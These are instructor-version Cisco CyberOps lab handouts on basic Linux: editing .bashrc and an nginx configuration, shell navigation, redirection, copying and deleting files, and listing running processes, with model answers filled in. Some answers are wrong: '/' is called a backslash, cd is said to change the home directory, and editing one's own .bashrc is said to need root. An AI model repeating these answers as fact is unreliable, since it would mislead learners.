directory, configuration files relating to system-wide services are place in the /etc directory, by
convention. Web services, print services, ftp services, email services are examples of services that affect

© Cisco and/or its affiliates. All rights reserved. This document is Cisco Public. Page 4 of 11
Lab – Working with Text Files in the CLI

the entire system and of which configuration files are stored under /etc. Notice that regular users do not
have writing access to /etc. This is important as it restricts the ability to change the system-wide service
configuration to the root user only.
Use the ls command to list the contents of the /etc directory:
[analyst@secOps ~]$ ls /etc
adjtime host.conf mke2fs.conf rc_maps.cfg
apache-ant hostname mkinitcpio.conf request-key.conf
apparmor.d hosts mkinitcpio.d request-key.d
arch-release ifplugd modprobe.d resolv.conf
avahi initcpio modules-load.d resolvconf.conf
bash.bash_logout inputrc motd rpc
bash.bashrc iproute2 mtab rsyslog.conf
binfmt.d iptables nanorc securetty
ca-certificates issue netconfig security
crypttab java-7-openjdk netctl services
dbus-1 java-8-openjdk netsniff-ng shadow
default kernel nginx shadow-
depmod.d krb5.conf nscd.conf shells
dhcpcd.conf ld.so.cache nsswitch.conf skel
dhcpcd.duid ld.so.conf ntp.conf ssh
dkms ld.so.conf.d openldap ssl
drirc libnl openvswitch sudoers
elasticsearch libpaper.d os-release sudoers.d
environment lightdm pacman.conf sudoers.pacnew
ethertypes locale.conf pacman.conf.pacnew sysctl.d
filebeat locale.gen pacman.d systemd
fonts locale.gen.pacnew pam.d tmpfiles.d
fstab localtime pango trusted-key.key
gai.conf login.defs papersize udev
gemrc logrotate.conf passwd UPower
group logrotate.d passwd- vdpau_wrapper.cfg
group- logstash pcmcia vimrc
group.pacnew lvm pkcs11 webapps
grub.d machine-id polkit-1 wgetrc
gshadow mail.rc profile X11
gshadow- makepkg.conf profile.d xdg
gshadow.pacnew man_db.conf protocols xinetd.d
gtk-2.0 mdadm.conf pulse yaourtrc
gtk-3.0 mime.types rc_keymaps
e. Use the cat command to display the contents of the bash_bashrc file:
[analyst@secOps ~]$ cat /etc/bash.bashrc
#
# /etc/bash.bashrc
#

# If not running interactively, don't do anything

[[ $- != *i* ]] && return

© Cisco and/or its affiliates. All rights reserved. This document is Cisco Public. Page 5 of 11
Lab – Working with Text Files in the CLI

PS1='[\u@\h \W]\$ '

case ${TERM} in
xterm*|rxvt*|Eterm|aterm|kterm|gnome*)
PROMPT_COMMAND=${PROMPT_COMMAND:+$PROMPT_COMMAND; }'printf "\033]0;%s@%s:%s\007"
"${USER}" "${HOSTNAME%%.*}" "${PWD/#$HOME/\~}"'

;;
screen)
PROMPT_COMMAND=${PROMPT_COMMAND:+$PROMPT_COMMAND; }'printf "\033_%s@%s:%s\033\\"
"${USER}" "${HOSTNAME%%.*}" "${PWD/#$HOME/\~}"'
;;
esac

[ -r /usr/share/bash-completion/bash_completion ] && . /usr/share/bash-

completion/bash_completion
[analyst@secOps ~]$
The syntax of bash_bashrc is out of scope of this course. This file defines the default behavior of the
shell for all users. If a user wants to customize his/her own shell behavior, the default behavior can be
overridden by editing the .bashrc file located in the user’s home directory. Because this is a system-wide
configuration, the configuration file is placed under /etc, making it editable only by the root user.
Therefore, the user will have to log in as root to modify .bashrc.
Why are user application configuration files saved in the user’s home directory and not under /etc with all
the other system-wide configuration files?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Regular users do not have permission to write to /etc. Because Linux is a multi-user operating system,
placing user-application configuration files under /etc would keep users from being able to customize their
applications.

Step 2: Editing and Saving Configuration files

As mentioned before, configuration files can be edited with text editors.
Let’s edit .bashrc to change the color of the shell prompt from green to red for the analyst user.
a. First, open SciTE by selecting Applications > CyberOPS > SciTE from the tool bar located in the upper
portion of the Cisco CyberOPS VM screen.
b. Select File > Open to launch SciTE’s Open File window.

© Cisco and/or its affiliates. All rights reserved. This document is Cisco Public. Page 6 of 11
Lab – Working with Text Files in the CLI

c. Because .bashrc is a hidden file with no extension, SciTE does not display it in the file list. If the Location
feature is not visible in the dialog box, Change the type of file shown by selecting All Files (*) from the
type drop box, as shown below. All the files in the analyst’s home directory are shown.
d. Select .bashrc and click Open.

e. Locate 32 and replace it with 31. 32 is the color code for green, while 31 represents red.

f. Save the file by selecting File > Save and close SciTE by clicking the X icon.

© Cisco and/or its affiliates. All rights reserved. This document is Cisco Public. Page 7 of 11
Lab – Working with Text Files in the CLI

g. Click the Terminal application icon located on the Dock, at the bottom center of the Cisco CyberOPS VM
screen. The prompt should appear in red instead of green.
Did the terminal window which was already open also change color from green to red? Explain.
____________________________________________________________________________________
____________________________________________________________________________________
No. The .bashrc file is executed and applied when a terminal is first opened, so any previously opened
terminals will be unaffected by the changes to the .bashrc file.
h. The same change could have been made from the command line with a text editor such as nano. From a
new terminal window, type nano .bashrc to launch nano and automatically load the .bashrc file in it:
[analyst@secOps ~]$ nano .bashrc

GNU nano 2.8.1 File: .bashrc

export EDITOR=vim

PS1='\[\e[1;31m\][\u@\h \W]\$\[\e[0m\] '

alias ls="ls --color"
alias vi="vim"

[ Read 5 lines ]
^G Get Help ^O Write Out ^W Where Is ^K Cut Text ^J Justify ^C Cur Pos
^X Exit ^R Read File ^\ Replace ^U Uncut Text^T To Spell ^_ Go To Line
i. Change 31 to 33. 33 is the color code to yellow.
j. Press CTRL+X to save and then press Y to confirm. Nano will also offer you the chance to change the
filename. Simply press ENTER to use the same name, .bashrc.
k. Nano will end, and you will be back on the shell prompt. Again, click the Terminal application icon located
on the Dock, at the bottom center of the Cisco CyberOps VM screen. The prompt should now appear in
yellow instead of red.

Step 3: Editing Configuration Files for Services

System-wide configuration files are not very different from the user-application files. nginx is a lightweight
web server that is installed in the Cisco CyberOPS VM. nginx can be customized by changing its
configuration file, which is located in under /etc/nginx.
a. First, open nginx’s configuration file in a nano. The configuration file name used here is
custom_server.conf. Notice below that the command is preceded by the sudo command. After typing
nano include a space and the -l switch to turn on line-numbering.
[analyst@secOps ~]$ sudo nano -l /etc/nginx/custom_server.conf
[sudo] password for analyst:
Use the arrow keys to navigate through the file.

GNU nano 2.9.5 /etc/nginx/custom_server.conf

© Cisco and/or its affiliates. All rights reserved. This document is Cisco Public. Page 8 of 11
Lab – Working with Text Files in the CLI

1
2 #user html;
3 worker_processes 1;
4
5 #error_log logs/error.log;
6 #error_log logs/error.log notice;
7 #error_log logs/error.log info;
8
9 #pid logs/nginx.pid;
10
11
12 events {
13 worker_connections 1024;
14 }
15
16
17 http {
18 include mime.types;
19 default_type application/octet-stream;
20
21 #log_format main '$remote_addr - $remote_user [$time_local] "$request" '
22 # '$status $body_bytes_sent "$http_referer" '
23 # '"$http_user_agent" "$http_x_forwarded_for"';
24
25 #access_log logs/access.log main;
26
27 sendfile on;
28 #tcp_nopush on;
29
30 #keepalive_timeout 0;
31 keepalive_timeout 65;
32
33 #gzip on;
34
35 types_hash_max_size 4096;
36 server_names_hash_bucket_size 128;
37
38 server {
39 listen 81;
40 server_name localhost;
41
42 #charset koi8-r;
43
44 #access_log logs/host.access.log main;
45
46 location / {
47 root /usr/share/nginx/html;
48 index index.html index.htm;
49 }

© Cisco and/or its affiliates. All rights reserved. This document is Cisco Public. Page 9 of 11
Lab – Working with Text Files in the CLI

^G Get Help ^O Write Out ^W Where Is ^K Cut Text ^J Justify ^C Cur Pos
^X Exit ^R Read File ^\ Replace ^U Uncut Text ^T To Spell ^_ Go To Line
Note: Conventionally, .conf extensions are used to identify configuration files.
b. While the configuration file has many parameters, we will configure only two: the port nginx listens on for
incoming connections, and the directory it will serve web pages from, including the index HTML homepage
file.
c. Notice that at the bottom of the window, above the nano commands, the line number is highlighted and
listed. On line 39, change the port number from 81 to 8080. This will tell nginx to listen to HTTP requests
on port TCP 8080.
d. Next, move to line 47 and change the path from /usr/share/nginx/html/ to
/usr/share/nginx/html/text_ed_lab/
Note: Be careful not to remove the semi-colon at the end of the line or nginx will throw an error on startup.
e. Press CTRL+X to save the file. Press Y and then ENTER to confirm and use the custom_server.conf as
the filename.
f. Type the command below to execute nginx using the modified configuration file:
[analyst@secOps ~]$ sudo nginx -c custom_server.conf "pid /var/run/
nginx_v.pid;"
Note: The "pid /var/run/nginx_v.pid;" is needed to tell nginx what file to use when storing the process ID
that identifies this instance of nginx.
g. Click the web browser icon on the Dock to launch Firefox.
h. On the address bar, type 127.0.0.1:8080 to connect to a web server hosted on the local machine on port
8080. A page related to this lab should appear.
i. After successfully opening the nginx homepage, look at the connection message in the terminal window.
What is the error message referring to?
____________________________________________________________________________________
The error message was generated by the successful web page connection and seems to be caused by a
missing favicon.ico file in the lab.support.files directory.
j. To shut down the nginx webserver, press ENTER to get a command prompt and type the following
command in the terminal window:
[analyst@secOps ~]$ sudo pkill nginx
k. You can test whether the nginx server is indeed shut down by first clearing the recent history in the web
browser, then close and re-open the web browser, then go to the nginx homepage at 127.0.0.1:8080.
Does the web page appear? _____ No.

Challenge: Can you edit the /etc/nginx/custom_configuration.conf file with SciTE? Describe the process
below.
Remember, because the file is stored under /etc, you will need root permissions to edit it.
_______________________________________________________________________________________
_______________________________________________________________________________________
From a terminal window, issue sudo scite /etc/nginx/custom_configuration.conf to launch scite as root.

© Cisco and/or its affiliates. All rights reserved. This document is Cisco Public. Page 10 of 11
Lab – Working with Text Files in the CLI

Reflection
Depending on the service, more options may be available for configuration.
Configuration file location, syntax, and available parameters will vary from service to service. Always consult
the documentation for information.
Permissions are a very common cause of problems. Make sure you have the correct permissions before
trying to edit configuration files.
More often than not, services must be restarted before the changes take effect.

© Cisco and/or its affiliates. All rights reserved. This document is Cisco Public. Page 11 of 11
Lab – Getting Familiar with the Linux Shell (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Introduction
In this lab, you will use the Linux command line to manage files and folders, and perform some basic
administrative tasks.

Recommended Equipment
 CyberOps Workstation Virtual Machine
Instructor Note: This lab can be done using the virtual machine created in a previous lab.

Part 1: Shell Basics

The shell is the term used to refer to the command interpreter in Linux. Also known as Terminal, Command
Line and Command Prompt, the shell is very powerful way to interact with a Linux computer.

Step 1: Access the Command Line

a. Log on to the CyberOps Workstation VM as the analyst using the password cyberops. The account
analyst is used as the example user account throughout this lab.
b. To access the command line, click the terminal icon located in the Dock, at the bottom of VM screen. The
terminal emulator opens.

Step 2: Display Manual Pages from the command line.

You can display command line help using the man command. A man page, short for manual page, is an built-
in documentation of the Linux commands. A man page provides detailed information about a given command
and all its available options.
a. To learn more about the man page, type:
[analyst@secOps ~]$ man man
Name a few sections that are included in a man page.
____________________________________________________________________________________
____________________________________________________________________________________
A few sections in a man page are: Name, Synopsis, Configuration, Description, Options, Exit status,
Return value, Errors, Environment, Files, Versions, Conforming to, Notes, Bugs, Example, Authors, and
See also.
b. Type q to exit the man page.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 1 of 9 www.netacad.com
Lab – Getting Familiar with the Linux Shell

c. Use the man command to learn more about the cp command:

[analyst@secOps ~]$ man cp
What is the function of the cp command?
____________________________________________________________________________________
____________________________________________________________________________________
Copy files from one location to another location in the local filesystem.
What command would you use to find out more information about the pwd command? What is the
function of the pwd command?
____________________________________________________________________________________
____________________________________________________________________________________
The man pwd command is used to access the man page about pwd. The pwd command prints the name
of the current or working directory.

Step 3: Create and change directories.

In this step, you will use the change directory (cd), make directory (mkdir), and list directory (ls) commands.
Note: A directory is another word for folder. The terms directory and folder are used interchangeably
throughout this lab.
a. Type pwd at the prompt.
[analyst@secOps ~]$ pwd
/home/analyst
What is the current directory?
____________________________________________________________________________________
Answers may vary. The current directory is /home/analyst in this example.
b. Navigate to the /home/analyst directory if it is not your current directory. Type cd /home/analyst
[analyst@secOps ~]$ cd /home/analyst
c. Type ls -l at the command prompt to list the files and folders that are in the current folder. Standing for
list, the -l option displays file size, permissions, ownership, date of creation and more.
[analyst@secOps ~]$ ls -l
total 20
drwxr-xr-x 2 analyst analyst 4096 Sep 26 2014 Desktop
drwx------ 3 analyst analyst 4096 Jul 14 11:28 Downloads
drwxr-xr-x 8 analyst analyst 4096 Jul 25 16:27 lab.support.files
drwxr-xr-x 2 analyst analyst 4096 Mar 3 15:56 second_drive
-rw-r--r-- 1 analyst analyst 254 Aug 16 13:38 space.txt
d. In the current directory, use the mkdir command to create three new folders: cyops_folder1,
cyops_folder2, and cyops_folder3. Type mkdir cyops_folder1 and press Enter. Repeat these steps to
create cyops_folder2 and cyops_folder3.
[analyst@secOps ~]$ mkdir cyops_folder1
[analyst@secOps ~]$ mkdir cyops_folder2
[analyst@secOps ~]$ mkdir cyops_folder3
[analyst@secOps ~]$

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 2 of 9 www.netacad.com
Lab – Getting Familiar with the Linux Shell

e. Type ls -l to verify that the folders have been created:

[analyst@secOps ~]$ ls -l
total 32
drwxr-xr-x 2 analyst analyst 4096 Aug 16 15:01 cyops_folder1
drwxr-xr-x 2 analyst analyst 4096 Aug 16 15:02 cyops_folder2
drwxr-xr-x 2 analyst analyst 4096 Aug 16 15:02 cyops_folder3
drwxr-xr-x 2 analyst analyst 4096 Sep 26 2014 Desktop
drwx------ 3 analyst analyst 4096 Jul 14 11:28 Downloads
drwxr-xr-x 8 analyst analyst 4096 Jul 25 16:27 lab.support.files
drwxr-xr-x 2 analyst analyst 4096 Mar 3 15:56 second_drive
-rw-r--r-- 1 analyst analyst 254 Aug 16 13:38 space.txt
f. Type cd /home/analyst/cyops_folder3 at the command prompt and press Enter.
[analyst@secOps ~]$ cd /home/analyst/cyops_folder3
[analyst@secOps cyops_folder3]$
Which folder are you in now?
____________________________________________________________________________________
In this example, the current directory is /home/analyst/cyops_folder3 as indicated by cyops_folder3 at
the prompt.
Note: In the [analyst@secOps ~]$ prompt above: The tilde symbol ~ represents the current user’s home
directory. In this example, the current user’s home directory is /home/analyst. After the cd
/home/analyst/cyops_folder3 command, the current user’s home directory is now
/home/analyst/cyops_folder3.
Note: $ (dollar sign) indicates regular user privilege. If a ‘#’ (hashtag or pound sign) is displayed at the
prompt, it indicates elevated privilege (root user).
Note: While these symbols, conventions and main concepts remain the same, the prompt of a terminal
window is highly customizable in Linux. Therefore, the prompt structure seen in the CyberOps Worstation
VM will likely differ from the prompt in other Linux installations.
Challenge: Type the command cd ~ and describe what happens. Why did this happen?
____________________________________________________________________________________
The directory is changed to the home directory. Because the shell interprets the ~ as a shortcut for the
current user’s home directory, cd ~ changes to the current user’s home.
g. Use the mkdir command to create a new folder named cyops_folder4 inside the cyops_folder3 folder:
[analyst@secOps ~]$ mkdir /home/analyst/cyops_folder3/cyops_folder4
[analyst@secOps ~]$
h. Use the ls -l command to verify the folder creation.
analyst@secOps ~]$ ls –l /home/analyst/cyops_folder3
total 4
drwxr-xr-x 2 analyst analyst 4096 Aug 16 15:04 cyops_folder4
i. Up to this point, we have been using full paths. Full path is the term used when referring to paths that
always start at the root (/) directory. It is also possible to work with relative paths. Relative paths reduce

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 3 of 9 www.netacad.com
Lab – Getting Familiar with the Linux Shell

the amount of text to be typed. To understand relative paths, we must understand the . and .. (dot and
double) directories. From the cyops_folder3 directory, issue a ls –la:
analyst@secOps ~]$ ls –la /home/analyst/cyops_folder3
total 12
drwxr-xr-x 3 analyst analyst 4096 Aug 16 15:04 .
drwxr-xr-x 20 analyst analyst 4096 Aug 16 15:02 ..
drwxr-xr-x 2 analyst analyst 4096 Aug 16 15:04 cyops_folder4
The -a option tells ls to show all files. Notice the . and .. listings shown by ls. These listings are used by
the operating system to track the current directory (.) and the parent directory (..) You can see the use of
the . and .. when using the cd command to change directories. Using the cd command to change the
directory to the . directory incurs no visible directory change as the . points to the current directory itself.
j. Change the current directory to /home/analyst/cyops_folder3:
[analyst@secOps ~]$ cd /home/analyst/cyops_folder3
[analyst@secOps cyops_folder3]$
k. Type cd .
[analyst@secOps cyops_folder3]$ cd .
[analyst@secOps cyops_folder3]$
What happens?
____________________________________________________________________________________
Apparently nothing but the command interpreter has changed the directory to the current directory itself.
l. Changing the directory to the .. directory, will change to the directory that is one level up. This directory is
also known as parent directory. Type cd ..
[analyst@secOps cyops_folder3]$ cd ..
[analyst@secOps ~]$
What happens?
____________________________________________________________________________________
The directory was changed to /home/analyst, which is the directory immediately above cyops_folder3,
also known as parent directory.
What would be the current directory if you issued the cd .. command at [analyst@secOps ~]$?
____________________________________________________________________________________
/home
What would be the current directory if you issued the cd .. command at [analyst@secOps home]$?
____________________________________________________________________________________
/ (backslash), the root of the filesystem
What would be the current directory if you issued the cd .. command at [analyst@secOps /]$?
____________________________________________________________________________________
/ (backslash), the root of the filesystem. Because this is the highest level, no upward change is done as
the root directory has no parent directory.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 4 of 9 www.netacad.com
Lab – Getting Familiar with the Linux Shell

Step 4: Redirect Outputs.

Another powerful command line operator in Linux is known as redirect. Represented by the > symbol, this
operator allows the output of a command to be redirected to some location other the current terminal
window (the default).
a. Use the cd command to change to the /home/analyst/ (~) directory:
[analyst@secOps /]$ cd /home/analyst/
[analyst@secOps ~]$
b. Use the echo command to echo a message. Because no output was defined, echo will output to the
current terminal window:
analyst@secOps ~]$ echo This is a message echoed to the terminal by echo.
This is a message echoed to the terminal by echo.
c. Use the > operator to redirect the output of echo to a text file instead of to the screen:
analyst@secOps ~]$ echo This is a message echoed to the terminal by echo. >
some_text_file.txt
No output was shown. Is that expected?
____________________________________________________________________________________
Yes. The output was redirected to the some_text_file.txt file.
d. Notice that even though the some_text_file.txt file did not exist, it was automatically created to receive
the output generated by echo. Use the ls -l command to verify if the file was really created:
[analyst@secOps ~]$ ls –l some_text_file.txt
-rw-r--r-- 1 analyst analyst 50 Feb 24 16:11 some_text_file.txt
e. Use the cat command to display the contents of the some_text_file.txt text file:
[analyst@secOps ~]$ cat some_text_file.txt
This is a message echoed to the terminal by echo.
f. Use the > operator again to redirect a different echo output of echo to the some_text_file.txt text file:
analyst@secOps ~]$ echo This is a DIFFERENT message, once again echoed to the
terminal by echo. > some_text_file.txt
g. Once again, use the cat command to display the contents of the some_text_file.txt text file:
[analyst@secOps ~]$ cat some_text_file.txt
This is a DIFFERENT message, once again echoed to the terminal by echo.
What happened to the text file? Explain.
____________________________________________________________________________________
____________________________________________________________________________________
The text file was completely replaced by the new message. The > operator destroyed the contents of the
txt file before writing the message echoed by echo.

Step 5: Redirect and Append to a Text File.

a. Similar to the > operator, the >> operator also allows for redirecting data to files. The difference is that >>
appends data to the end of the referred file, keeping the current contents intact. To append a message to
the some_text_file.txt, issue command below:
[analyst@secOps ~]$ echo This is another line of text. It will be APPENDED to
the output file. >> some_text_file.txt

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 5 of 9 www.netacad.com
Lab – Getting Familiar with the Linux Shell

b. Use the cat command to display the contents of the some_text_file.txt text file yet again:
[analyst@secOps ~]$ cat some_text_file.txt
This is a DIFFERENT message, once again echoed to the terminal by echo.
This is another line of text. It will be APPENDED to the output file.
What happened to the text file? Explain.
____________________________________________________________________________________
The new message was appended to the end of the file, keeping the original contents intact.

Step 6: Work with hidden files in Linux.

a. In Linux, files with names that begin with a ‘.’ (single dot) are not shown by default. While dot-files have
nothing else special about them, they are called hidden files because of this feature. Examples of hidden
files are .file5, .file6, .file7.
Note: Do not confuse dot-files with the current directory indicator “.” symbol. Hidden file names begin with
a dot (period), followed by more characters while the dot directory is a hidden directory comprised of only
a single dot.
b. Use ls -l to display the files stored in the analyst home directory.
[analyst@secOps ~]$ ls –l
How many files are displayed?
____________________________________________________________________________________
Answer may vary based on the user’s prior lab activities and interactions in the CyberOps Worstation VM.
Make sure to also count the directories (displayed by ls in blue).
c. Use the ls -la command to display all files in the home directory of analyst, including the hidden files.
[analyst@secOps ~]$ ls –la
How many files are displayed now, more than before? Explain.
____________________________________________________________________________________
Many more as ls -la displays, in addition to regular files, all the hidden files in folder.
Is it possible to hide entire directories by adding a dot before its name as well? Are there any directories
in the output of ls -la above?
____________________________________________________________________________________
Yes, there are many hidden directories in the output.
Give three examples of hidden files shown in the output of ls -la above.
____________________________________________________________________________________
.config, .bash_history, .xinitrc
d. Type the man ls command at the prompt to learn more about the ls command.
[analyst@secOps ~]$ man ls
e. Use the down arrow key (one line at a time) or the space bar (one page at a time) to scroll down the page
and locate the -a used above and read its description to familiarize yourself with the ls -a command.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 6 of 9 www.netacad.com
Lab – Getting Familiar with the Linux Shell

Part 2: Copying, Deleting, and Moving Files

Step 1: Copying Files
a. The cp command is used to copy files around the local file system. When using cp, a new copy of the file
is created and placed in the specified location, leaving the original file intact. The first parameter is the
source file and the second is the destination. Issue the command below to copy some_text_file.txt from
the home directory to the cyops_folder2 folder:
[analyst@secOps ~]$ cp some_text_file.txt cyops_folder2/
Identify the parameters in the cp command above. What are the source and destination files? (use full
paths to represent the parameters)
____________________________________________________________________________________
Source: /home/analyst/some_text_file.txt. Destination:
/home/analyst/cyops_folder2/some_text_file.txt
b. Use the ls command to verify that some_text_file.txt is now in cyops_folder2:
[analyst@secOps ~]$ ls cyops_folder2/
some_text_file.txt
c. Use the ls command to verify that some_text_file.txt is also in the home directory:
[analyst@secOps ~]$ ls -l
total 36
drwxr-xr-x 2 analyst analyst 4096 Aug 16 15:01 cyops_folder1
drwxr-xr-x 2 analyst analyst 4096 Aug 16 15:11 cyops_folder2
drwxr-xr-x 3 analyst analyst 4096 Aug 16 15:04 cyops_folder3
drwxr-xr-x 2 analyst analyst 4096 Sep 26 2014 Desktop
drwx------ 3 analyst analyst 4096 Jul 14 11:28 Downloads
drwxr-xr-x 8 analyst analyst 4096 Jul 25 16:27 lab.support.files
drwxr-xr-x 2 analyst analyst 4096 Mar 3 15:56 second_drive
-rw-r--r-- 1 analyst analyst 142 Aug 16 15:09 some_text_file.txt
-rw-r--r-- 1 analyst analyst 254 Aug 16 13:38 space.txt

Step 2: Deleting Files and Directories

a. Use the rm command to remove files. Issue the command below to remove the file some_text_file.txt
from the home directory. The ls command is then used to show that the file some_text_file.txt has been
removed from the home directory:
[analyst@secOps ~]$ rm some_text_file.txt
[analyst@secOps ~]$ ls -l
total 32
drwxr-xr-x 2 analyst analyst 4096 Aug 16 15:01 cyops_folder1
drwxr-xr-x 2 analyst analyst 4096 Aug 16 15:11 cyops_folder2
drwxr-xr-x 3 analyst analyst 4096 Aug 16 15:04 cyops_folder3
drwxr-xr-x 2 analyst analyst 4096 Sep 26 2014 Desktop
drwx------ 3 analyst analyst 4096 Jul 14 11:28 Downloads
drwxr-xr-x 8 analyst analyst 4096 Jul 25 16:27 lab.support.files
drwxr-xr-x 2 analyst analyst 4096 Mar 3 15:56 second_drive
-rw-r--r-- 1 analyst analyst 254 Aug 16 13:38 space.txt

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 7 of 9 www.netacad.com
Lab – Getting Familiar with the Linux Shell

b. In Linux, directories are seen as a type of file. As such, the rm command is also used to delete directories
but the -r (recursive) option must be used. Notice that all files and other directories inside a given
directory are also deleted when deleting a parent directory. Issue the command below to delete the
cyops_folder1 folder and its contents:
[analyst@secOps ~]$ rm –r cyops_folder1
[analyst@secOps ~]$ ls -l
total 28
drwxr-xr-x 2 analyst analyst 4096 Aug 16 15:11 cyops_folder2
drwxr-xr-x 3 analyst analyst 4096 Aug 16 15:04 cyops_folder3
drwxr-xr-x 2 analyst analyst 4096 Sep 26 2014 Desktop
drwx------ 3 analyst analyst 4096 Jul 14 11:28 Downloads
drwxr-xr-x 8 analyst analyst 4096 Jul 25 16:27 lab.support.files
drwxr-xr-x 2 analyst analyst 4096 Mar 3 15:56 second_drive
-rw-r--r-- 1 analyst analyst 254 Aug 16 13:38 space.txt

Step 3: Moving Files and Directories

a. Moving files works similarly to copying files. The difference is that moving a file removes it from its original
location. Use the mv commands to move files around the local filesystem. Like the cp commands, the mv
command also requires source and destination parameters. Issue the command below to move the
some_text_file.txt from /home/analyst/cyops_folder2 back to the home directory:
[analyst@secOps ~]$ mv cyops_folder2/some_text_file.txt .
[analyst@secOps ~]$ ls –l cyops_folder2/
total 0
[analyst@secOps ~]$ ls –l /home/analyst/
total 32
drwxr-xr-x 2 analyst analyst 4096 Aug 16 15:13 cyops_folder2
drwxr-xr-x 3 analyst analyst 4096 Aug 16 15:04 cyops_folder3
drwxr-xr-x 2 analyst analyst 4096 Sep 26 2014 Desktop
drwx------ 3 analyst analyst 4096 Jul 14 11:28 Downloads
drwxr-xr-x 8 analyst analyst 4096 Jul 25 16:27 lab.support.files
drwxr-xr-x 2 analyst analyst 4096 Mar 3 15:56 second_drive
-rw-r--r-- 1 analyst analyst 142 Aug 16 15:11 some_text_file.txt
-rw-r--r-- 1 analyst analyst 254 Aug 16 13:38 space.txt
Why was the dot (“.”) used as the destination parameter for mv?
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
The dot (“.”) means that mv should move the file to the current directory. Since the current directory was
already /home/analyst/ (the directory where the file should be moved to), using the dot “.” represents just
that.
b. The mv command can also be used to move entire directories and the files they contain. To move the
cyops_folder3 (and all the files and directories it contains) into cyops_folder2, use the command below:
[analyst@secOps ~]$ mv cyops_folder3/ cyops_folder2/
[analyst@secOps ~]$ ls –l /home/analyst/
total 28

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 8 of 9 www.netacad.com
Lab – Getting Familiar with the Linux Shell

drwxr-xr-x 3 analyst analyst 4096 Aug 16 15:15 cyops_folder2

drwxr-xr-x 2 analyst analyst 4096 Sep 26 2014 Desktop
drwx------ 3 analyst analyst 4096 Jul 14 11:28 Downloads
drwxr-xr-x 8 analyst analyst 4096 Jul 25 16:27 lab.support.files
drwxr-xr-x 2 analyst analyst 4096 Mar 3 15:56 second_drive
-rw-r--r-- 1 analyst analyst 142 Aug 16 15:11 some_text_file.txt
-rw-r--r-- 1 analyst analyst 254 Aug 16 13:38 space.txt
c. Use the ls command to verify that the cyops_folder3 directory was correctly moved to cyops_folder2.
[analyst@secOps ~]$ ls –l cyops_folder2/
total 4
drwxr-xr-x 3 analyst analyst 4096 Feb 27 11:47 cyops_folder3

Reflection
What are the advantages of using the Linux command line?
_______________________________________________________________________________________
_______________________________________________________________________________________
Answers may vary. The command line allows the users more options and control over the graphical interface.
As the users become more experienced with the command line, the users may combine these commands in
scripts to perform routine tasks. The command line interface uses fewer resources when users administrate
the computers remotely.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 9 of 9 www.netacad.com
Lab – Linux Servers (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Introduction
In this lab, you will use the Linux command line to identify servers running on a given computer.

Recommended Equipment
 CyberOps Workstation Virtual Machine
Instructor Note: This lab can be done using the virtual machine created in a previous lab.

Part 1: Servers
Servers are essentially programs written to provide specific information upon request. Clients, which are also
programs, reach out to the server, place the request and wait for the server response. Many different client-
server communication technologies can be used, with the most common being IP networks. This lab focuses
on IP network-based servers and clients.

Step 1: Access the command line.

a. Log on to the CyberOps Workstation VM as the analyst, using the password cyberops. The account
analyst is used as the example user account throughout this lab.
b. To access the command line, click the terminal icon located in the Dock, at the bottom of VM screen. The
terminal emulator opens.

Step 2: Display the services currently running.

Many different programs can be running on a given computer, especially a computer running a Linux
operating system. Many programs run in the background so users may not immediately detect what programs
are running on a given computer. In Linux, running programs are also called processes.
Note: The output of your ps command will differ because it will be based on the state of your CyberOps
Workstation VM.
a. Use the ps command to display all the programs running in the background:
[analyst@secOps ~]$ sudo ps –elf
[sudo] password for analyst:
F S UID PID PPID C PRI NI ADDR SZ WCHAN STIME TTY TIME CMD
4 S root 1 0 0 80 0 - 2250 SyS_ep Feb27 ? 00:00:00 /sbin/init
1 S root 2 0 0 80 0 - 0 kthrea Feb27 ? 00:00:00 [kthreadd]
1 S root 3 2 0 80 0 - 0 smpboo Feb27 ? 00:00:00
[ksoftirqd/0]

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 1 of 7 www.netacad.com
Lab – Linux Servers

1 S root 5 2 0 60 -20 - 0 worker Feb27 ? 00:00:00

[kworker/0:0H]
1 S root 7 2 0 80 0 - 0 rcu_gp Feb27 ? 00:00:00
[rcu_preempt]
1 S root 8 2 0 80 0 - 0 rcu_gp Feb27 ? 00:00:00 [rcu_sched]
1 S root 9 2 0 80 0 - 0 rcu_gp Feb27 ? 00:00:00 [rcu_bh]
1 S root 10 2 0 -40 - - 0 smpboo Feb27 ? 00:00:00
[migration/0]
1 S root 11 2 0 60 -20 - 0 rescue Feb27 ? 00:00:00 [lru-add-
drain]
5 S root 12 2 0 -40 - - 0 smpboo Feb27 ? 00:00:00
[watchdog/0]
1 S root 13 2 0 80 0 - 0 smpboo Feb27 ? 00:00:00 [cpuhp/0]
5 S root 14 2 0 80 0 - 0 devtmp Feb27 ? 00:00:00 [kdevtmpfs]
1 S root 15 2 0 60 -20 - 0 rescue Feb27 ? 00:00:00 [netns]
1 S root 16 2 0 80 0 - 0 watchd Feb27 ? 00:00:00
[khungtaskd]
1 S root 17 2 0 80 0 - 0 oom_re Feb27 ? 00:00:00
[oom_reaper]
<some output omitted>
Why was it necessary to run ps as root (prefacing the command with sudo)?
____________________________________________________________________________________
____________________________________________________________________________________
Some processes do not belong to the analyst user and may not be displayed if ps was executed as
analyst, which is a regular user account.
b. In Linux, programs can also call other programs. The ps command can also be used to display such
process hierarchy. Use –ejH options to display the currently running process tree.
Note: The process information for the nginx service is highlighted. Your PID values will be different.
Note: If nginx is not running, enter the sudo /usr/sbin/nginx command at the command prompt to start
the nginx service.
[analyst@secOps ~]$ sudo ps –ejH
[sudo] password for analyst:
PID PGID SID TTY TIME CMD
1 1 1 ? 00:00:00 systemd
167 167 167 ? 00:00:01 systemd-journal
193 193 193 ? 00:00:00 systemd-udevd
209 209 209 ? 00:00:00 rsyslogd
